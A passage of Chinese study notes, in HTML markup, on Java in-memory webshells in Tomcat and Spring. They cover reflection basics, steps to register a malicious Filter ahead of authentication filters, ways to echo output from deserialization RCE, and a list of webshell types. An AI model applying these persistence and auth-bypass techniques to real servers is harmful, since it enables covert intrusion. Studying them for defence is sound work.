              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">2. 使用`Class`对象的`getDeclaredField()`方法获取字段对象。该方法需要传入字段的名称作为参数。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">3. 设置字段可访问性。如果字段是私有的，需要调用`setAccessible(true)`方法将其设置为可访问的。这样可以绕过访问修饰符的限制。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">4. 使用`Field`对象的`get()`方法获取字段的值。该方法需要传入要获取值的对象作为参数，如果字段是静态的，可以传入`null`。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">5. 根据字段的类型进行必要的类型转换。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">下面是一个示例代码，演示如何使用反射的`get`方法获取对象的字段值：</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">```java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">import java.lang.reflect.Field;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">public class ReflectionExample {</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">    </span>public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException {</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>// 获取要访问的类的Class对象</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>MyClass obj = new MyClass();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>Class clazz = obj.getClass();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>// 获取字段对象</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>Field field = clazz.getDeclaredField("myField");</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>// 设置字段可访问性</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>field.setAccessible(true);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>// 获取字段的值</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>Object value = field.get(obj);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>// 类型转换</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>if (value instanceof String) {</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">            </span>String strValue = (String) value;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">            </span>System.out.println("Field value: " + strValue);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">        </span>}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">    </span>}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">class MyClass {</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style=""><span style="mso-spacerun:yes;">    </span>private String myField = "Hello, World!";</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">```</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">在上述示例中，我们首先获取了`MyClass`的`Class`对象，然后通过`getDeclaredField()`方法获取了名为`myField`的字段对象。接下来，通过调用`setAccessible(true)`方法设置字段可访问性。最后，使用`get()`方法获取字段的值，并进行类型转换。在本例中，我们将字段的值转换为`String`类型，并输出到控制台上。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">需要注意的是，使用反射的`get`方法获取字段值可能会导致性能下降，并且不符合封装性原则。因此，建议在正常情况下优先使用对象的公共方法来访问和修改其字段值。只有在特殊情况下，例如在框架或库的开发中，才需要使用反射来访问私有字段。</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">一句话概述，先获取实例，再通过实例.class获取该实例的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;font-weight:bold;">对象（类）</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">，通过getDeclaredField,获取这个</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;font-weight:bold;">对象（类）</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">的</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;font-weight:bold;">私有属性的对象（类）</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">，再通过这个私有属性对象（类）的get方法传入</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;font-weight:bold;">实例</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">，获取这个</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;font-weight:bold;">实例</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">的私有属性的值</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">创建一个恶意 Filter</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">利用 FilterDef 对 Filter 进行一个封装</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">将 FilterDef 添加到 FilterDefs 和 FilterConfig</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">4.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">创建 FilterMap ，将我们的 Filter 和 urlpattern 相对应，存放到 filterMaps中（由于 Filter 生效会有一个先后顺序，所以我们一般都是放在最前面，让我们的 Filter 最先触发）</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:宋体;">内存马/反序列化RCE 回显方式</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">报错回显</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">web中获取当前上下文对象（response、context、writer等）</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">tomcat通过applicationFilterChain中的lastServicedRequest和lastServicedResponse设置并获取当前ThreadLocal的Request和Response变量</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">spring通过ContextLoader.getCurrentWebApplicationContext().getServletContext()获得</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">spring也可以通过RequestContextHolder.getRequestAttributes().getRequest()获得</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">可以出网情况下OOB</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">4.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">在LINUX环境下，可以通过文件描述符"/proc/self/fd/i"获取到网络连接，在java中我们可以直接通过文件描述符获取到一个Stream对象，对当前网络连接进行读写操作，可以釜底抽薪在根源上解决回显问题（Poller内存马的出现已经解决fd的问题，这个方法感觉被替代了）</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">通过指定客户端发起请求的源端口号，通过cat grep awk组合大法在tcp表中拿到inode，用拿到的inode号再去fd目录下再用cat grep wak大法拿到文件描述符的数字，再调用java代码打开文件描述符即可实现带内回显</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://xz.aliyun.com/t/7307" target="_blank">https://xz.aliyun.com/t/7307</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">这个文章的评论提了利用socks的fd文件做80端口复用的方法，可以再去看下suo5的脚本看能不能改造流量转发工具</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="http://www.phpweblog.net/GaRY/archive/2011/10/09/PHP_Port_Reuse_With_Apache_FD.html" target="_blank">http://www.phpweblog.net/GaRY/archive/2011/10/09/PHP_Port_Reuse_With_Apache_FD.html</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马反序列化rce-回显方式;"><span style="font-family:Cambria;">天下大木头文章中提到的参考链接文章和参考链接文章中提到的参考链接都去看一遍，有重复但都有额外内容</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="font-family:宋体;">内存马类型</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Calibri;">tomcat</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">filter</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">listener</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">servlet</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">java agent </span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">Spring Interceptor（拦截器） 内存马</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">Valve</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">Websocket</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">Executor</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:内存马类型;"><span style="mso-bookmark:tomcat-2;"><span style="font-family:Cambria;">Spring Controller</span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Calibri;">filter内存马</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">反射修改final属性值</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">filterRegistration</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">addMappingForUrlPatterns</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">util</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">EnumSet</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">of</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">DispatcherType</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">REQUEST</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">),</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">false</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"/*"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">});</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//这里添加filtermap<span style="mso-spacerun:yes;">                    </span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">这里第二个参数是false默认会把filter加到首位，但是后面还是要强制把filter的位置放到第一个，beichen师傅讲解原因如下：</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">是为了让自己的过滤器永远排在第一位，也就是当请求过来的时候优先调用恶意的过滤器，为什么这么写呢，假如有的网站有鉴权过滤器，不登录的用户永远访问不到你的过滤器</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">用everything搜索maven找到idea安装的maven把路径添加到环境变量</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="">C:\Program Files\JetBrains\IntelliJ IDEA 2023.1\plugins\maven\lib\maven3\bin</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">打包三梦和</span></span></span><span 